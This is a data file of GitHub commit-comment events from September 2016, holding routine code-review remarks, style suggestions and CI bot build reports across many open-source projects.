{"id":"4627470923","type":"CommitCommentEvent","actor":{"login":"BatuhanK"},"repo":{"name":"mzdr/macOS"},"payload":{"comment":{"id":19199461,"position":null,"line":null,"path":null,"commit_id":"a72aeef13c68722b6fe2900b3aa9d878f4306e7d","created_at":"2016-09-27T22:55:21Z","updated_at":"2016-09-27T22:55:21Z","body":"Thank you for being part of our project, btw we will keep this commit because it gives clear message to us which is: never run shell command without looking the file 👍 \r\n\r\n<img width=\"976\" alt=\"ekran resmi 2016-09-28 01 52 40\" src=\"https://cloud.githubusercontent.com/assets/4688083/18894880/4e3e86f2-851e-11e6-8701-eb5cac808e6d.png\">\r\n"}},"created_at":"2016-09-27T22:55:21Z"}
{"id":"4627479960","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":19199488,"position":14,"line":387,"path":"gravity.sh","commit_id":"b275100d89f32a209ea6c759d9497d856abc918c","created_at":"2016-09-27T22:57:43Z","updated_at":"2016-09-27T22:57:43Z","body":"```\r\nWhen it receives a SIGHUP, dnsmasq clears its cache and then re-loads /etc/hosts and /etc/ethers and any file given by --dhcp-hostsfile, --dhcp-hostsdir, --dhcp-optsfile, --dhcp-optsdir, --addn-hosts or --hostsdir. The dhcp lease change script is called for all existing DHCP leases. If --no-poll is set SIGHUP also re-reads /etc/resolv.conf. SIGHUP does NOT re-read the configuration file.\r\n```"}},"created_at":"2016-09-27T22:57:43Z"}
{"id":"4627480735","type":"CommitCommentEvent","actor":{"login":"billziss-gh"},"repo":{"name":"billziss-gh/secfs.test"},"payload":{"comment":{"id":19199490,"position":null,"line":null,"path":null,"commit_id":"2eb38417829e6df252bc9cc2173c3cb4bfdf1819","created_at":"2016-09-27T22:57:55Z","updated_at":"2016-09-27T22:57:55Z","body":"And of course I mean to say: \"try running shlex in non-POSIX mode\"!"}},"created_at":"2016-09-27T22:57:55Z"}
{"id":"4627481760","type":"CommitCommentEvent","actor":{"login":"arvind"},"repo":{"name":"uwdata/vega"},"payload":{"comment":{"id":19199494,"position":17,"line":102,"path":"PORTING_GUIDE.md","commit_id":"3a7be8854e118857f8c01f1ee306de8f409c8a1c","created_at":"2016-09-27T22:58:12Z","updated_at":"2016-09-27T22:58:12Z","body":"Typo: `defualt` -> `default`"}},"created_at":"2016-09-27T22:58:12Z"}
{"id":"4627485215","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":19199508,"position":14,"line":387,"path":"gravity.sh","commit_id":"b275100d89f32a209ea6c759d9497d856abc918c","created_at":"2016-09-27T22:59:01Z","updated_at":"2016-09-27T22:59:01Z","body":"So it depends on what you wanted to happen, SIGHUP would reload `gravity.list` but that's it, it wouldn't reload any configuration changes."}},"created_at":"2016-09-27T22:59:01Z"}
{"id":"4627486496","type":"CommitCommentEvent","actor":{"login":"dhermes"},"repo":{"name":"GoogleCloudPlatform/google-cloud-python"},"payload":{"comment":{"id":19199510,"position":null,"line":null,"path":null,"commit_id":"e651d3e8830b7671dad3b8ec400d33f6fcbc196e","created_at":"2016-09-27T22:59:20Z","updated_at":"2016-09-27T22:59:20Z","body":"@waprin FYI `__dict__` would give a more comprehensive idea of what's in `result`"}},"created_at":"2016-09-27T22:59:20Z"}
{"id":"4627489183","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19199517,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T23:00:02Z","updated_at":"2016-09-27T23:00:02Z","body":"`const` ensures an explicit intent for not re-assigning a variable (not changing the once-stored reference); this is a useful precaution, and adds even more benefits when accompanied by a linter which highlights errors and gives suggestions live during code editing."}},"created_at":"2016-09-27T23:00:02Z"}
{"id":"4627496138","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19199537,"position":155,"line":155,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T23:01:47Z","updated_at":"2016-09-27T23:01:47Z","body":"In retrospect, I don't think anyone would ever want to do PreOrder or PostOrder. However, people may be interested in going in ascending order or descending order."}},"created_at":"2016-09-27T23:01:47Z"}
{"id":"4627502817","type":"CommitCommentEvent","actor":{"login":"waprin"},"repo":{"name":"GoogleCloudPlatform/google-cloud-python"},"payload":{"comment":{"id":19199549,"position":null,"line":null,"path":null,"commit_id":"e651d3e8830b7671dad3b8ec400d33f6fcbc196e","created_at":"2016-09-27T23:03:33Z","updated_at":"2016-09-27T23:03:33Z","body":"yeah I was experimenting with different things."}},"created_at":"2016-09-27T23:03:33Z"}
{"id":"4627502881","type":"CommitCommentEvent","actor":{"login":"sthaha"},"repo":{"name":"product-definition-center/pdc-ruby-gem"},"payload":{"comment":{"id":19199550,"position":5,"line":69,"path":"lib/pdc/resource/identity.rb","commit_id":"136f1088c209dc320f2efe0864c6df30f3cd0dea","created_at":"2016-09-27T23:03:34Z","updated_at":"2016-09-27T23:03:34Z","body":"No, it shouldn't. The url of an object/instance is the url/api-endpoint it was fetched from. An object  created from a particular PDC server is not the same as another object with the same id on different server. \r\nLets say PDC gets reconfigured and we do find(id) again. It not going to return the same object, is it?\r\n"}},"created_at":"2016-09-27T23:03:34Z"}
{"id":"4627504510","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19199553,"position":106,"line":106,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T23:03:59Z","updated_at":"2016-09-27T23:03:59Z","body":"Put this conditional on a new line. When the previous condition ends with a `return`, `break`, `continue`, etc, there is no need to do else-if.\r\n\r\n```go\r\nif condA {\r\n\t...\r\n\treturn\r\n} else if condB {\r\n\t...\r\n}\r\n```\r\n\r\nIs better written as:\r\n```go\r\nif condA {\r\n\t...\r\n\treturn\r\n}\r\nif condB {\r\n\t...\r\n}\r\n```\r\n\r\n"}},"created_at":"2016-09-27T23:03:59Z"}
{"id":"4627504552","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199554,"position":11,"line":72,"path":"kong/tools/database_cache.lua","commit_id":"f665ae6c165955ac32b92e32b87fdc316e8a25b3","created_at":"2016-09-27T23:03:59Z","updated_at":"2016-09-27T23:03:59Z","body":"Please use Penlight's `pl.tablex.readonly()`"}},"created_at":"2016-09-27T23:03:59Z"}
{"id":"4627504579","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"coinbase/coinbase-python"},"payload":{"comment":{"id":19199555,"position":null,"line":null,"path":null,"commit_id":"c5bf3aa0bdec494276cf2a328d21ba5f68aaf135","created_at":"2016-09-27T23:04:00Z","updated_at":"2016-09-27T23:04:00Z","body":"[master-fd7e6614c60430e728e53ed59a7d432e03ce9779.zip](https://github.com/coinbase/coinbase-python/files/496805/master-fd7e6614c60430e728e53ed59a7d432e03ce9779.zip)\r\n"}},"created_at":"2016-09-27T23:04:00Z"}
{"id":"4627504868","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19199557,"position":13,"line":4,"path":"developer/ruby/UpdateHVACLibrary.rb","commit_id":"7669d4d2ced26a5a46d0462a536cded1781c733b","created_at":"2016-09-27T23:04:05Z","updated_at":"2016-09-27T23:04:05Z","body":"@evanweaver this is the script to run on major releases"}},"created_at":"2016-09-27T23:04:05Z"}
{"id":"4627505956","type":"CommitCommentEvent","actor":{"login":"Salandora"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":19199561,"position":null,"line":null,"path":null,"commit_id":"d9e3553c7c4e18646f1d360822eeb07ba6586e95","created_at":"2016-09-27T23:04:20Z","updated_at":"2016-09-27T23:04:20Z","body":"-.- why did you deleted the elementByPath and pathForElement functions?\r\nMy FileManagerPlugin still needs them :-)\r\n"}},"created_at":"2016-09-27T23:04:20Z"}
{"id":"4627508532","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19199567,"position":103,"line":103,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T23:05:00Z","updated_at":"2016-09-27T23:05:00Z","body":"These can be written as:\r\n\r\n```go\r\nswitch {\r\ncase h.left == nil:\r\n\t...\r\ncase h.right == nil:\r\n\t...\r\ndefault:\r\n\t ...\r\n}\r\n```"}},"created_at":"2016-09-27T23:05:00Z"}
{"id":"4627509671","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199571,"position":5,"line":333,"path":"kong/conf_loader.lua","commit_id":"f665ae6c165955ac32b92e32b87fdc316e8a25b3","created_at":"2016-09-27T23:05:17Z","updated_at":"2016-09-27T23:05:17Z","body":"(This is missing a test for this behavior)"}},"created_at":"2016-09-27T23:05:17Z"}
{"id":"4627512173","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199575,"position":5,"line":333,"path":"kong/conf_loader.lua","commit_id":"f665ae6c165955ac32b92e32b87fdc316e8a25b3","created_at":"2016-09-27T23:05:55Z","updated_at":"2016-09-27T23:05:55Z","body":"(in the unit tests for `conf_loader`)"}},"created_at":"2016-09-27T23:05:55Z"}
{"id":"4627512920","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19199577,"position":65,"line":65,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T23:06:05Z","updated_at":"2016-09-27T23:06:05Z","body":"Drop the `else` and just have `h = h.left` on the next line. The `break` in the previous body ensures that the lines to follow are effectively an `else` block."}},"created_at":"2016-09-27T23:06:05Z"}
{"id":"4627515981","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199584,"position":null,"line":null,"path":null,"commit_id":"004cfd1ab0c71e72dfcd22dc40e0aa5b786bffce","created_at":"2016-09-27T23:06:54Z","updated_at":"2016-09-27T23:06:54Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\n"}},"created_at":"2016-09-27T23:06:54Z"}
{"id":"4627516387","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19199586,"position":39,"line":39,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T23:07:01Z","updated_at":"2016-09-27T23:07:01Z","body":"Put conditional on next line. See my comment on L106."}},"created_at":"2016-09-27T23:07:01Z"}
{"id":"4627517682","type":"CommitCommentEvent","actor":{"login":"penduin"},"repo":{"name":"netmail-open/wjelement"},"payload":{"comment":{"id":19199588,"position":null,"line":null,"path":null,"commit_id":"d5898528ca89978f2996248dbb04ec8c4cc55dc3","created_at":"2016-09-27T23:07:23Z","updated_at":"2016-09-27T23:07:23Z","body":"I've put in a separate schema fix which seems to do the trick."}},"created_at":"2016-09-27T23:07:23Z"}
{"id":"4627518694","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19199590,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-27T23:07:39Z","updated_at":"2016-09-27T23:07:39Z","body":"When using setup.cfg we can also move the configuration for flake8 and pytest from tox.ini to setup.cfg to have all configuration at one exposed place. "}},"created_at":"2016-09-27T23:07:39Z"}
{"id":"4627520465","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":19199594,"position":null,"line":null,"path":null,"commit_id":"7109c423d59dd015c5898b5764f130bae469094a","created_at":"2016-09-27T23:08:09Z","updated_at":"2016-09-27T23:08:09Z","body":"Nice! 😄 "}},"created_at":"2016-09-27T23:08:09Z"}
{"id":"4627522953","type":"CommitCommentEvent","actor":{"login":"ybank"},"repo":{"name":"apache/hadoop"},"payload":{"comment":{"id":19199596,"position":17,"line":58,"path":"hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/blockmanagement/CacheReplicationMonitor.java","commit_id":"93e23a99157c30b51752fc49748c3c210745a187","created_at":"2016-09-27T23:08:50Z","updated_at":"2016-09-27T23:08:50Z","body":"Just came across this when I am doing code analysis. Very minor issue, though."}},"created_at":"2016-09-27T23:08:50Z"}
{"id":"4627525150","type":"CommitCommentEvent","actor":{"login":"thefosk"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199599,"position":5,"line":333,"path":"kong/conf_loader.lua","commit_id":"f665ae6c165955ac32b92e32b87fdc316e8a25b3","created_at":"2016-09-27T23:09:27Z","updated_at":"2016-09-27T23:09:27Z","body":"Fixed in be52e2946c58622425efa36ffd8b5d1b3f14e2b9"}},"created_at":"2016-09-27T23:09:27Z"}
{"id":"4627525192","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19199600,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-27T23:09:27Z","updated_at":"2016-09-27T23:09:27Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.04%25-green.svg)</a>\n"}},"created_at":"2016-09-27T23:09:27Z"}
{"id":"4627525362","type":"CommitCommentEvent","actor":{"login":"thefosk"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199601,"position":11,"line":72,"path":"kong/tools/database_cache.lua","commit_id":"f665ae6c165955ac32b92e32b87fdc316e8a25b3","created_at":"2016-09-27T23:09:29Z","updated_at":"2016-09-27T23:09:29Z","body":"Fixed in be52e2946c58622425efa36ffd8b5d1b3f14e2b9"}},"created_at":"2016-09-27T23:09:29Z"}
{"id":"4627527060","type":"CommitCommentEvent","actor":{"login":"acliss19xx"},"repo":{"name":"hiroaki-ohkawa/ikoma-library-app-proto"},"payload":{"comment":{"id":19199607,"position":null,"line":null,"path":null,"commit_id":"11aa0edb8f8f086c735560a49ca95acc9e4de435","created_at":"2016-09-27T23:09:58Z","updated_at":"2016-09-27T23:09:58Z","body":"カルーセル表示に設定した場合の挙動を変更しました。表示は1冊ずつ、スワイプで次へ行く形です。\r\n自動スライドにはしていません。表示に関しては、詳細を使用しています。\r\n元々あった詳細画面の、「司書コメントのモーダル設定」と、「戻る」ボタンは、削除しています。\r\n「司書コメントのモーダル設定」に関しては、カルーセル内とモーダルウィンドウの表示に関しては相談したいです。"}},"created_at":"2016-09-27T23:09:58Z"}
{"id":"4627530876","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199612,"position":10,"line":64,"path":"spec/01-unit/02-conf_loader_spec.lua","commit_id":"be52e2946c58622425efa36ffd8b5d1b3f14e2b9","created_at":"2016-09-27T23:10:58Z","updated_at":"2016-09-27T23:10:58Z","body":"That should be a different test? This test is that we load `custom_plugins`. That test we now want is if we also strip their names. This is asserting 2 behaviors in the same test."}},"created_at":"2016-09-27T23:10:58Z"}
{"id":"4627533156","type":"CommitCommentEvent","actor":{"login":"thefosk"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199619,"position":10,"line":64,"path":"spec/01-unit/02-conf_loader_spec.lua","commit_id":"be52e2946c58622425efa36ffd8b5d1b3f14e2b9","created_at":"2016-09-27T23:11:39Z","updated_at":"2016-09-27T23:11:39Z","body":"@thibaultcha thought the tests would be excessively verbose (we are testing a strip), but sure."}},"created_at":"2016-09-27T23:11:39Z"}
{"id":"4627536642","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199628,"position":10,"line":64,"path":"spec/01-unit/02-conf_loader_spec.lua","commit_id":"be52e2946c58622425efa36ffd8b5d1b3f14e2b9","created_at":"2016-09-27T23:12:38Z","updated_at":"2016-09-27T23:12:38Z","body":"No it's fine, especially with those unit tests which are only a few LOC and fast to run."}},"created_at":"2016-09-27T23:12:38Z"}
{"id":"4627538931","type":"CommitCommentEvent","actor":{"login":"elmindreda"},"repo":{"name":"glfw/glfw"},"payload":{"comment":{"id":19199634,"position":null,"line":null,"path":null,"commit_id":"5964f74e3aa36e7284e351d3b3d091a6d454d363","created_at":"2016-09-27T23:13:18Z","updated_at":"2016-09-27T23:13:18Z","body":"@encelo Sorry, I don't remember what the conditions were and I can't find the associated issue."}},"created_at":"2016-09-27T23:13:18Z"}
{"id":"4627539148","type":"CommitCommentEvent","actor":{"login":"nojb"},"repo":{"name":"nojb/ocaml-imap"},"payload":{"comment":{"id":19199635,"position":561,"line":747,"path":"lib/imap.ml","commit_id":"34ae26d7f03cbaca516491bbcfe729bdb73fce0b","created_at":"2016-09-27T23:13:22Z","updated_at":"2016-09-27T23:13:22Z","body":"Hi @samoht! Thanks for the comment...  Yes, actually I took a look at `angstrom` a while back; It looks like a very nice general library, but since I am parsing off strings which are already in memory (no streaming), I can do this more efficiently using function calls and exceptions instead of carrying continuations everywhere....  Also not having to write binds everywhere really helps with the readability of the parser (which is already quite long and convoluted) ..."}},"created_at":"2016-09-27T23:13:22Z"}
{"id":"4627540079","type":"CommitCommentEvent","actor":{"login":"msterin"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19199638,"position":72,"line":1171,"path":"esx_service/vmdk_ops.py","commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-27T23:13:39Z","updated_at":"2016-09-27T23:13:39Z","body":"I think it should be ret.encode() rather that ret_string.encode() ? Or better, ret above should be named ret_string"}},"created_at":"2016-09-27T23:13:39Z"}
{"id":"4627540552","type":"CommitCommentEvent","actor":{"login":"thefosk"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19199639,"position":10,"line":64,"path":"spec/01-unit/02-conf_loader_spec.lua","commit_id":"be52e2946c58622425efa36ffd8b5d1b3f14e2b9","created_at":"2016-09-27T23:13:47Z","updated_at":"2016-09-27T23:13:47Z","body":"Fixed with 9e93547454b8f2b819e7ea71b2493bd9b7649a5e"}},"created_at":"2016-09-27T23:13:47Z"}
{"id":"4627541070","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19199642,"position":null,"line":null,"path":null,"commit_id":"33481ff8795369b4700d74a7174e3ee753ac4c1d","created_at":"2016-09-27T23:13:57Z","updated_at":"2016-09-27T23:13:57Z","body":"develop (evanweaver) - x86_64-MacOS-10.10-clang: OK (2389 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33481ff8795369b4700d74a7174e3ee753ac4c1d-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33481ff8795369b4700d74a7174e3ee753ac4c1d-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.59%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T23:13:57Z"}
{"id":"4627542701","type":"CommitCommentEvent","actor":{"login":"danielfernandez"},"repo":{"name":"thymeleaf/thymeleaf"},"payload":{"comment":{"id":19199645,"position":null,"line":null,"path":null,"commit_id":"94df4811323005e4d385000d17fc85c3a4ea6ce2","created_at":"2016-09-27T23:14:25Z","updated_at":"2016-09-27T23:14:25Z","body":"Fixes #538"}},"created_at":"2016-09-27T23:14:25Z"}
{"id":"4627548505","type":"CommitCommentEvent","actor":{"login":"msterin"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19199647,"position":46,"line":1106,"path":"esx_service/vmdk_ops.py","commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-27T23:16:01Z","updated_at":"2016-09-27T23:16:01Z","body":"looking in vmci_server.c it seems we do not need the vmciLock. All is either on stack, or passed as ret_string buffer..."}},"created_at":"2016-09-27T23:16:01Z"}
{"id":"4627549247","type":"CommitCommentEvent","actor":{"login":"borgstrom"},"repo":{"name":"jenkinsci/timestamper-plugin"},"payload":{"comment":{"id":19199648,"position":5,"line":5,"path":"src/main/webapp/style.css","commit_id":"c31dc9571d5d1121d3f7e43d81059e0818e58b7a","created_at":"2016-09-27T23:16:14Z","updated_at":"2016-09-27T23:16:14Z","body":"@StevenGBrown -- `white` is not a good default choice since not all console output has a white background, I suggest this be changed to `inherit`, which on my Jenkins instance with the material theme looks proper.\r\n\r\nThis was also commented on in the JIRA ticket: https://issues.jenkins-ci.org/browse/JENKINS-34019?focusedCommentId=271468&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-271468"}},"created_at":"2016-09-27T23:16:14Z"}
{"id":"4627549392","type":"CommitCommentEvent","actor":{"login":"Max-108"},"repo":{"name":"klanomath/RepairDisk"},"payload":{"comment":{"id":19199649,"position":null,"line":null,"path":null,"commit_id":"bed3fab4a3eaed4f304f039c678b82787c414af3","created_at":"2016-09-27T23:16:16Z","updated_at":"2016-09-27T23:16:16Z","body":"Thanks klanomath 👍 "}},"created_at":"2016-09-27T23:16:16Z"}
{"id":"4627550138","type":"CommitCommentEvent","actor":{"login":"christocracy"},"repo":{"name":"drew-r/cordova-plugin-background-geolocation"},"payload":{"comment":{"id":19199651,"position":null,"line":null,"path":null,"commit_id":"53cab31ffd9e47ea6d8eac77e67d127386ed982d","created_at":"2016-09-27T23:16:28Z","updated_at":"2016-09-27T23:16:28Z","body":"There's far more involved than simply removing this key.  You might as well not even use this plugin at all if that's  all you're going to do.\r\n\r\nYou're going to have to get your hands very dirty in the Obj-c if you hope to at least get sig.changes events to fire in the background (typically every 500-1000m) and process the locations theough the plugin's existing persistence and http layers.\r\n"}},"created_at":"2016-09-27T23:16:28Z"}
{"id":"4627551411","type":"CommitCommentEvent","actor":{"login":"tgag25"},"repo":{"name":"tgag25/prog"},"payload":{"comment":{"id":19199656,"position":null,"line":null,"path":null,"commit_id":"aec52112c690d8febb612e38c68964e4c46bbd1a","created_at":"2016-09-27T23:16:50Z","updated_at":"2016-09-27T23:16:50Z","body":"INSTALLATION QTSUDOKU"}},"created_at":"2016-09-27T23:16:50Z"}
{"id":"4627551861","type":"CommitCommentEvent","actor":{"login":"chakrm"},"repo":{"name":"clubzspadez/clubzspadez.github.io"},"payload":{"comment":{"id":19199657,"position":4,"line":9,"path":"index.html","commit_id":"b834731d7f0a8d9bf5b121733c607e546d82b1ff","created_at":"2016-09-27T23:16:58Z","updated_at":"2016-09-27T23:16:58Z","body":"this isn't https"}},"created_at":"2016-09-27T23:16:58Z"}
{"id":"4627560126","type":"CommitCommentEvent","actor":{"login":"msterin"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19199674,"position":99,"line":1182,"path":"esx_service/vmdk_ops.py","commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-27T23:19:17Z","updated_at":"2016-09-27T23:19:17Z","body":"nit: would be nice to explain lock names somewhere in the comments - specifically, how they are formed. "}},"created_at":"2016-09-27T23:19:17Z"}
{"id":"4627560951","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19199677,"position":null,"line":null,"path":null,"commit_id":"81fc10ffde7c936ecb1ac932e0e4a16990fca16d","created_at":"2016-09-27T23:19:30Z","updated_at":"2016-09-27T23:19:30Z","body":"You forget add:\r\n\r\n`BudrikMinosCount = 65050`\r\n\r\nor not neccesary??"}},"created_at":"2016-09-27T23:19:30Z"}
{"id":"4627561135","type":"CommitCommentEvent","actor":{"login":"vargaz"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19199680,"position":45,"line":761,"path":"mcs/class/corlib/Test/System.Globalization/CultureInfoTest.cs","commit_id":"54ea12e4fa41bae72704a260aadc398328b73b16","created_at":"2016-09-27T23:19:32Z","updated_at":"2016-09-27T23:19:32Z","body":"This test seems to hang on ios. Even a stripped down version hangs:\r\n\r\n\t\t\tFunc<Task> f = async () => {\r\n\t\t\t\tawait Task.Yield ();\r\n\t\t\t};\r\n\t\t\tf ().Wait ();\r\n"}},"created_at":"2016-09-27T23:19:32Z"}
{"id":"4627571119","type":"CommitCommentEvent","actor":{"login":"msterin"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19199702,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-27T23:22:19Z","updated_at":"2016-09-27T23:22:19Z","body":"Looks good. Comments inline.  How do you think automated test should look like ?"}},"created_at":"2016-09-27T23:22:19Z"}
{"id":"4627572926","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199705,"position":null,"line":null,"path":null,"commit_id":"5d75bed8a083cf468773e410db62ce96b84be1b2","created_at":"2016-09-27T23:22:52Z","updated_at":"2016-09-27T23:22:52Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\n- [CONTRIBUTING.md](https://github.com/pantheon-systems/documentation/commit/5d75bed8a083cf468773e410db62ce96b84be1b2/CONTRIBUTING.md)\n- [docs/contribute](https://codeofcon-static-docs.pantheonsite.io/docs/contribute)\n- [source/docs/contribute.md](https://github.com/pantheon-systems/documentation/commit/5d75bed8a083cf468773e410db62ce96b84be1b2/source/docs/contribute.md)\n"}},"created_at":"2016-09-27T23:22:52Z"}
{"id":"4627573387","type":"CommitCommentEvent","actor":{"login":"chakrm"},"repo":{"name":"clubzspadez/clubzspadez.github.io"},"payload":{"comment":{"id":19199708,"position":5,"line":67,"path":"scripts/js/app.js","commit_id":"1154d028d48b25ee1d612544a7753939e6031119","created_at":"2016-09-27T23:23:00Z","updated_at":"2016-09-27T23:23:00Z","body":"this looks better now"}},"created_at":"2016-09-27T23:23:00Z"}
{"id":"4627575131","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199713,"position":null,"line":null,"path":null,"commit_id":"394f34e7bc48ce7e2419e8b7d610c7e20433b21c","created_at":"2016-09-27T23:23:33Z","updated_at":"2016-09-27T23:23:33Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\n"}},"created_at":"2016-09-27T23:23:33Z"}
{"id":"4627577275","type":"CommitCommentEvent","actor":{"login":"Neverbirth"},"repo":{"name":"fdorg/flashdevelop"},"payload":{"comment":{"id":19199719,"position":null,"line":null,"path":null,"commit_id":"48e949ceb7ce55edbaf01d972b3cd86e015efe4e","created_at":"2016-09-27T23:24:11Z","updated_at":"2016-09-27T23:24:11Z","body":"Tomorrow I'll start looking into improving the CI side, wanted to do it right after the merge, but got some unexpected calls from work ^^U..."}},"created_at":"2016-09-27T23:24:11Z"}
{"id":"4627578501","type":"CommitCommentEvent","actor":{"login":"levity"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":19199723,"position":null,"line":null,"path":null,"commit_id":"5a01c6a3f81d0e26a1e0dcdf3f1c02987ca05dd1","created_at":"2016-09-27T23:24:28Z","updated_at":"2016-09-27T23:24:28Z","body":"true -- maybe we can just trigger the action at certain times? it's not good to trigger a server roundtrip for something that will be a no-op 99% of the time"}},"created_at":"2016-09-27T23:24:28Z"}
